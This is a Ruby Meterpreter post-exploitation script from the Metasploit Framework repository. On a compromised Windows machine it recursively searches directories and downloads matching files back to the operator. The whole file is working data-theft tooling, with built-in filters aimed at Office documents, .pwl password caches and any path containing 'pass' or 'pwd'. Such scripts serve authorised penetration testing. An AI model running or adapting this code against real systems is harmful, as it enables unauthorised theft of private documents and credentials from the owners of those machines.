GitHub Repository: rapid7/metasploit-framework
Path: blob/master/scripts/meterpreter/search_dwld.rb

##
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
# If you'd like to improve this script, please try to port it as a post
# module instead. Thank you.
##


## Meterpreter script that recursively searches for and downloads
## files matching a given pattern
## Provided by Nicob <nicob [at] nicob.net>

## == WARNING ==
## As said by mmiller, this kind of script is slow and noisy:
## http://www.metasploit.com/archive/framework/msg01670.html
## However, it can sometimes save your ass ;-)
## == WARNING ==

# Filters: predefined name => regular expression matched against the full path
$filters = {
  'office' => '\.(doc|docx|ppt|pptx|pps|xls|xlsx|mdb|od.)$',
  'win9x' => '\.pwl$',
  'passwd' => '(pass|pwd)',
}

@@opts = Rex::Parser::Arguments.new(
  "-h" => [ false,"Help menu." ]
)

def usage
  print_line "search_dwld -- recursively search for and download files matching a given pattern"
  print_line "USAGE: run search_dwld [base directory] [filter] [pattern]"
  print_line
  print_line "filter can be a defined pattern or 'free', in which case pattern must be given"
  print_line "Defined patterns:"
  print_line $filters.keys.sort.collect{|k| "\t#{k}"}.join("\n")
  print_line
  print_line "Examples:"
  print_line " run search_dwld"
  print_line " => recursively look for (MS|Open)Office in C:\\"
  print_line " run search_dwld %USERPROFILE% win9x"
  print_line " => recursively look for *.PWL files in the user home directory"
  # '\\.' so that the help text shows the backslash of the example regexp
  print_line " run search_dwld E:\\\\ free '\\.(jpg|png|gif)$'"
  print_line " => recursively look for pictures in the E: drive"
  print_line(@@opts.usage)
  raise Rex::Script::Completed
end

@@opts.parse(args) { |opt, idx, val|
  case opt
  when "-h"
    usage
  end
}

# Walk the directory tree under path; every file whose full path matches
# $motif (case-insensitive) is downloaded to the local temp directory
def scan(path)
  begin
    dirs = client.fs.dir.foreach(path)
  rescue ::Rex::Post::Meterpreter::RequestError => e
    print_error("Error scanning #{path}: #{e}")
    return
  end

  dirs.each {|x|
    next if x =~ /^(\.|\.\.)$/
    fullpath = path + '\\' + x

    if client.fs.file.stat(fullpath).directory?
      scan(fullpath)
    elsif fullpath =~ /#{$motif}/i
      # Replace ':' or '%' or '\' by '_'
      dst = fullpath.tr_s(":|\%|\\", "_")
      dst = Rex::FileUtils.clean_path(::Dir.tmpdir + ::File::Separator + dst)
      print_line("Downloading '#{fullpath}' to '#{dst}'")
      client.fs.file.download_file(dst, fullpath)
    end
  }
end

# Check for proper Meterpreter platform
def unsupported
  print_error("This version of Meterpreter is not supported with this Script!")
  raise Rex::Script::Completed
end


unsupported if client.platform != 'windows'
# Get arguments
basedir = args[0] || "C:\\"
filter = args[1] || "office"

# Set the regexp
if filter == 'free'
  if args[2].nil?
    raise "free filter requires pattern argument"
  end
  $motif = args[2]
else
  $motif = $filters[filter]
end

if $motif.nil?
  raise "Unrecognized filter"
end

# Search and download
scan(basedir)